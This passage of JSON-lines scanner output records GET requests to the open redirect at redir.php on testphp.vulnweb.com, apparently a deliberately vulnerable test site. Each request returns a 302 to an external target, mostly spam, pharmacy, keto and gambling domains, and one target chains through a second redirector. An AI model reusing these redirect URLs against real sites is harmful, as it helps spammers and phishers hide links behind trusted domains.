tml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=Trendingquiz.com/\",\"time\":\"347.460305ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:22.654867066Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=alraziuni.edu.ye%2F\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=alraziuni.edu.ye%2F\",\"location\":\"alraziuni.edu.ye/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=alraziuni.edu.ye%2F\",\"time\":\"348.540314ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:22.784318501Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=atghockeyettanfo1.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=atghockeyettanfo1.blogspot.com/\",\"location\":\"atghockeyettanfo1.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=atghockeyettanfo1.blogspot.com/\",\"time\":\"343.768201ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:22.902132373Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=atrytone-bigcountrytonescom8973.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=atrytone-bigcountrytonescom8973.blogspot.com/\",\"location\":\"atrytone-bigcountrytonescom8973.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=atrytone-bigcountrytonescom8973.blogspot.com/\",\"time\":\"343.060037ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:22.946061075Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=babymagazinetoday.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=babymagazinetoday.com\",\"location\":\"babymagazinetoday.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=babymagazinetoday.com\",\"time\":\"357.538457ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:23.293320291Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=bestpicktech.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=bestpicktech.com\",\"location\":\"bestpicktech.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=bestpicktech.com\",\"time\":\"340.149663ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:23.709591846Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=bit.ly/2TN5d3Y\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=bit.ly/2TN5d3Y\",\"location\":\"bit.ly/2TN5d3Y\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=bit.ly/2TN5d3Y\",\"time\":\"342.98457ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:23.716731235Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=carsmarketing12.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=carsmarketing12.blogspot.com/\",\"location\":\"carsmarketing12.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=carsmarketing12.blogspot.com/\",\"time\":\"342.707404ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:23.937244922Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=carsvoyage.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=carsvoyage.blogspot.com/\",\"location\":\"carsvoyage.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=carsvoyage.blogspot.com/\",\"time\":\"356.29677ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:24.45608998Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=caxinwencom.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=caxinwencom.blogspot.com/\",\"location\":\"caxinwencom.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=caxinwencom.blogspot.com/\",\"time\":\"356.41735ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:24.541935016Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=desighneremallcom.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=desighneremallcom.blogspot.com/\",\"location\":\"desighneremallcom.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=desighneremallcom.blogspot.com/\",\"time\":\"338.895174ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:26.204666816Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=desighnerru.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=desighnerru.blogspot.com/\",\"location\":\"desighnerru.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=desighnerru.blogspot.com/\",\"time\":\"342.231877ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:27.517687982Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=dewjiblogcom.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=dewjiblogcom.blogspot.com/\",\"location\":\"dewjiblogcom.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=dewjiblogcom.blogspot.com/\",\"time\":\"352.509676ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:27.52567059Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=donnemaincom.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=donnemaincom.blogspot.com/\",\"location\":\"donnemaincom.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=donnemaincom.blogspot.com/\",\"time\":\"348.6347ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:27.858344514Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=emedycynaestetycznacompl.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=emedycynaestetycznacompl.blogspot.com/\",\"location\":\"emedycynaestetycznacompl.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=emedycynaestetycznacompl.blogspot.com/\",\"time\":\"341.302325ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:28.72385126Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=factstalks.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=factstalks.com\",\"location\":\"factstalks.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=factstalks.com\",\"time\":\"347.639273ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:28.753894654Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=fashionmagazinetoday.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=fashionmagazinetoday.com\",\"location\":\"fashionmagazinetoday.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=fashionmagazinetoday.com\",\"time\":\"350.290462ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:28.787442246Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=fassionaeu1.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=fassionaeu1.blogspot.com/\",\"location\":\"fassionaeu1.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=fassionaeu1.blogspot.com/\",\"time\":\"344.509972ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:28.80318626Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=flavorfascination.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=flavorfascination.com/\",\"location\":\"flavorfascination.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=flavorfascination.com/\",\"time\":\"352.467572ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.118194848Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=healthomecc1.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=healthomecc1.blogspot.com/\",\"location\":\"healthomecc1.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=healthomecc1.blogspot.com/\",\"time\":\"345.136671ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.150756587Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=herodungeonscom.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=herodungeonscom.blogspot.com/\",\"location\":\"herodungeonscom.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=herodungeonscom.blogspot.com/\",\"time\":\"339.26642ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.154698055Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=healthwawpl32.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=healthwawpl32.blogspot.com/\",\"location\":\"healthwawpl32.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=healthwawpl32.blogspot.com/\",\"time\":\"343.41229ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.234974173Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Faero-tech.ir/aero-plus/miscellaneous/calendar/calendar-1402/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Faero-tech.ir/aero-plus/miscellaneous/calendar/calendar-1402/management.html\",\"location\":\"http://aero-tech.ir/aero-plus/miscellaneous/calendar/calendar-1402/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Faero-tech.ir/aero-plus/miscellaneous/calendar/calendar-1402/management.html\",\"time\":\"355.301512ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.283144271Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Faero-tech.ir/digi-prices/gold-and-coin-price/today-gold-and-the-others-price/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Faero-tech.ir/digi-prices/gold-and-coin-price/today-gold-and-the-others-price/management.html\",\"location\":\"http://aero-tech.ir/digi-prices/gold-and-coin-price/today-gold-and-the-others-price/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Faero-tech.ir/digi-prices/gold-and-coin-price/today-gold-and-the-others-price/management.html\",\"time\":\"362.535067ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.400506546Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fcllca.org%2Findex.php%2Fcommunity%2Fprofile%2Fbonnymacdonnell%2F\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fcllca.org%2Findex.php%2Fcommunity%2Fprofile%2Fbonnymacdonnell%2F\",\"location\":\"http://cllca.org/index.php/community/profile/bonnymacdonnell/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Fcllca.org%2Findex.php%2Fcommunity%2Fprofile%2Fbonnymacdonnell%2F\",\"time\":\"355.681562ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.451437762Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Ffitformketopills.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Ffitformketopills.com\",\"location\":\"http://fitformketopills.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Ffitformketopills.com\",\"time\":\"361.780537ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.484425216Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Ffsecan.ca%2Fblog%2Findex.php%3Fentryid%3D299730\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Ffsecan.ca%2Fblog%2Findex.php%3Fentryid%3D299730\",\"location\":\"http://fsecan.ca/blog/index.php?entryid=299730\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Ffsecan.ca%2Fblog%2Findex.php%3Fentryid%3D299730\",\"time\":\"343.526836ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.536383703Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fggeek.ru%2Fbitrix%2Fredirect.php%3Fgoto%3Dhttps%3A%2F%2Fpuremethodketo.org\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fggeek.ru%2Fbitrix%2Fredirect.php%3Fgoto%3Dhttps%3A%2F%2Fpuremethodketo.org\",\"location\":\"http://ggeek.ru/bitrix/redirect.php?goto=https://puremethodketo.org\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Fggeek.ru%2Fbitrix%2Fredirect.php%3Fgoto%3Dhttps%3A%2F%2Fpuremethodketo.org\",\"time\":\"352.06657ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.615425766Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fhoneybeepharmacy.com%2Fverzenio-abemaciclib%2F\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fhoneybeepharmacy.com%2Fverzenio-abemaciclib%2F\",\"location\":\"http://honeybeepharmacy.com/verzenio-abemaciclib/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Fhoneybeepharmacy.com%2Fverzenio-abemaciclib%2F\",\"time\":\"348.536007ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.702331055Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fhypestyleco.net\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fhypestyleco.net\",\"location\":\"http://hypestyleco.net\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Fhypestyleco.net\",\"time\":\"352.271062ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:29.781000217Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fnfl.eklablog.com%2F\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fnfl.eklablog.com%2F\",\"location\":\"http://nfl.eklablog.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Fnfl.eklablog.com%2F\",\"time\":\"352.905923ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:33.001704924Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fsitusbali777.onepage.website\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fsitusbali777.onepage.website\",\"location\":\"http://situsbali777.onepage.website\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Fsitusbali777.onepage.website\",\"time\":\"344.639899ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:33.143814523Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Ftheelyrics.com%2F\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Ftheelyrics.com%2F\",\"location\":\"http://theelyrics.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Ftheelyrics.com%2F\",\"time\":\"354.490708ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:33.257836113Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fwww.cq51edu.com%2Flink.php%3Furl%3Dhttp%3A%2F%2Fwww5f.biglobe.ne.jp%2F~hokuto_hinata_itou_obi%2FLapin%2Fyybbs%2Fyybbs.cgi\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fwww.cq51edu.com%2Flink.php%3Furl%3Dhttp%3A%2F%2Fwww5f.biglobe.ne.jp%2F~hokuto_hinata_itou_obi%2FLapin%2Fyybbs%2Fyybbs.cgi\",\"location\":\"http://www.cq51edu.com/link.php?url=http://www5f.biglobe.ne.jp/~hokuto_hinata_itou_obi/Lapin/yybbs/yybbs.cgi\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Fwww.cq51edu.com%2Flink.php%3Furl%3Dhttp%3A%2F%2Fwww5f.biglobe.ne.jp%2F~hokuto_hinata_itou_obi%2FLapin%2Fyybbs%2Fyybbs.cgi\",\"time\":\"351.692224ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:33.289217466Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fwww.studua.org%2Fbocoran-rtp-stay-slot-tertinggi-arsip%2F\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http%3A%2F%2Fwww.studua.org%2Fbocoran-rtp-stay-slot-tertinggi-arsip%2F\",\"location\":\"http://www.studua.org/bocoran-rtp-stay-slot-tertinggi-arsip/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http%3A%2F%2Fwww.studua.org%2Fbocoran-rtp-stay-